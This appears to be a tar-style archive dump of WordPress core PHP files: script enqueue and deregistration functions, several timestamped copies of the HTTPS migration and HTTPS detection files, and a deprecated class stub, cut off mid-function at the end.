* @param string $handle Script handle the textdomain will be attached to.
* @param string $domain Optional. Text domain. Default 'default'.
* @param string $path Optional. The full file path to the directory containing translation files.
* @return bool True if the text domain was successfully localized, false otherwise.
*/
function wp_set_script_translations( $handle, $domain = 'default', $path = '' ) {
global $wp_scripts;
if ( ! ( $wp_scripts instanceof WP_Scripts ) ) {
_wp_scripts_maybe_doing_it_wrong( __FUNCTION__, $handle );
return false;
}
return $wp_scripts->set_translations( $handle, $domain, $path );
}
/**
* Removes a registered script.
*
* Note: there are intentional safeguards in place to prevent critical admin scripts,
* such as jQuery core, from being unregistered.
*
* @see WP_Dependencies::remove()
*
* @since 2.1.0
*
* @global string $pagenow The filename of the current screen.
*
* @param string $handle Name of the script to be removed.
*/
function wp_deregister_script( $handle ) {
global $pagenow;
_wp_scripts_maybe_doing_it_wrong( __FUNCTION__, $handle );
/**
* Do not allow accidental or negligent de-registering of critical scripts in the admin.
* Show minimal remorse if the correct hook is used.
*/
$current_filter = current_filter();
if ( ( is_admin() && 'admin_enqueue_scripts' !== $current_filter ) ||
( 'wp-login.php' === $pagenow && 'login_enqueue_scripts' !== $current_filter )
) {
$not_allowed = array(
'jquery',
'jquery-core',
'jquery-migrate',
'jquery-ui-core',
'jquery-ui-accordion',
'jquery-ui-autocomplete',
'jquery-ui-button',
'jquery-ui-datepicker',
'jquery-ui-dialog',
'jquery-ui-draggable',
'jquery-ui-droppable',
'jquery-ui-menu',
'jquery-ui-mouse',
'jquery-ui-position',
'jquery-ui-progressbar',
'jquery-ui-resizable',
'jquery-ui-selectable',
'jquery-ui-slider',
'jquery-ui-sortable',
'jquery-ui-spinner',
'jquery-ui-tabs',
'jquery-ui-tooltip',
'jquery-ui-widget',
'underscore',
'backbone',
);
if ( in_array( $handle, $not_allowed, true ) ) {
_doing_it_wrong(
__FUNCTION__,
sprintf(
/* translators: 1: Script name, 2: wp_enqueue_scripts */
__( 'Do not deregister the %1$s script in the administration area. To target the front-end theme, use the %2$s hook.' ),
"<code>$handle</code>",
'<code>wp_enqueue_scripts</code>'
),
'3.6.0'
);
return;
}
}
wp_scripts()->remove( $handle );
}
/**
* Enqueues a script.
*
* Registers the script if `$src` provided (does NOT overwrite), and enqueues it.
*
* @see WP_Dependencies::add()
* @see WP_Dependencies::add_data()
* @see WP_Dependencies::enqueue()
*
* @since 2.1.0
* @since 6.3.0 The $in_footer parameter of type boolean was overloaded to be an $args parameter of type array.
* @since 6.9.0 The $fetchpriority parameter of type string was added to the $args parameter of type array.
*
* @param string $handle Name of the script. Should be unique.
* @param string $src Full URL of the script, or path of the script relative to the WordPress root directory.
* Default empty.
* @param string[] $deps Optional. An array of registered script handles this script depends on. Default empty array.
* @param string|bool|null $ver Optional. String specifying script version number, if it has one, which is added to the URL
* as a query string for cache busting purposes. If version is set to false, a version
* number is automatically added equal to current installed WordPress version.
* If set to null, no version is added.
* @param array|bool $args {
* Optional. An array of additional script loading strategies. Default empty array.
* Otherwise, it may be a boolean in which case it determines whether the script is printed in the footer. Default false.
*
* @type string $strategy Optional. If provided, may be either 'defer' or 'async'.
* @type bool $in_footer Optional. Whether to print the script in the footer. Default 'false'.
* @type string $fetchpriority Optional. The fetch priority for the script. Default 'auto'.
* }
*/
function wp_enqueue_script( $handle, $src = '', $deps = array(), $ver = false, $args = array() ) {
_wp_scripts_maybe_doing_it_wrong( __FUNCTION__, $handle );
$wp_scripts = wp_scripts();
if ( $src || ! empty( $args ) ) {
$_handle = explode( '?', $handle );
if ( ! is_array( $args ) ) {
$args = array(
'in_footer' => (bool) $args,
);
}
if ( $src ) {
$wp_scripts->add( $_handle[0], $src, $deps, $ver );
}
if ( ! empty( $args['in_footer'] ) ) {
$wp_scripts->add_data( $_handle[0], 'group', 1 );
}
if ( ! empty( $args['strategy'] ) ) {
$wp_scripts->add_data( $_handle[0], 'strategy', $args['strategy'] );
}
if ( ! empty( $args['fetchpriority'] ) ) {
$wp_scripts->add_data( $_handle[0], 'fetchpriority', $args['fetchpriority'] );
}
}
$wp_scripts->enqueue( $handle );
}
/**
* Removes a previously enqueued script.
*
* @see WP_Dependencies::dequeue()
*
* @since 3.1.0
*
* @param string $handle Name of the script to be removed.
*/
function wp_dequeue_script( $handle ) {
_wp_scripts_maybe_doing_it_wrong( __FUNCTION__, $handle );
wp_scripts()->dequeue( $handle );
}
/**
* Determines whether a script has been added to the queue.
*
* For more information on this and similar theme functions, check out
* the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
* Conditional Tags} article in the Theme Developer Handbook.
*
* @since 2.8.0
* @since 3.5.0 'enqueued' added as an alias of the 'queue' list.
*
* @param string $handle Name of the script.
* @param string $status Optional. Status of the script to check. Default 'enqueued'.
* Accepts 'enqueued', 'registered', 'queue', 'to_do', and 'done'.
* @return bool Whether the script is queued.
*/
function wp_script_is( $handle, $status = 'enqueued' ) {
_wp_scripts_maybe_doing_it_wrong( __FUNCTION__, $handle );
return (bool) wp_scripts()->query( $handle, $status );
}
/**
* Adds metadata to a script.
*
* Works only if the script has already been registered.
*
* Possible values for $key and $value:
* 'strategy' string 'defer' or 'async'.
*
* @since 4.2.0
* @since 6.9.0 Updated possible values to remove reference to 'conditional' and add 'strategy'.
*
* @see WP_Dependencies::add_data()
*
* @param string $handle Name of the script.
* @param string $key Name of data point for which we're storing a value.
* @param mixed $value String containing the data to be added.
* @return bool True on success, false on failure.
*/
function wp_script_add_data( $handle, $key, $value ) {
return wp_scripts()->add_data( $handle, $key, $value );
}
https-migration-20260605120603-20260621081201.php 0000666 00000011205 15224151220 0013335 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260606010046-20260621081103-20260621181002.php 0000666 00000011205 15224151220 0014712 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605164841-20260621081103.php 0000666 00000013341 15224151220 0013342 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260605090858.php 0000666 00000013341 15224151220 0011773 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-migration-20260614061720-20260621081211-20260621145632.php 0000666 00000011205 15224151220 0014727 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
class.wp-scripts.php 0000666 00000000527 15224151220 0010476 0 ustar 00 <?php
/**
* Dependencies API: WP_Scripts class
*
* This file is deprecated, use 'wp-includes/class-wp-scripts.php' instead.
*
* @deprecated 6.1.0
* @package WordPress
*/
_deprecated_file( basename( __FILE__ ), '6.1.0', WPINC . '/class-wp-scripts.php' );
/** WP_Scripts class */
require_once ABSPATH . WPINC . '/class-wp-scripts.php';
https-migration-20260605101354-20260621081201.php 0000666 00000011205 15224151220 0013337 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
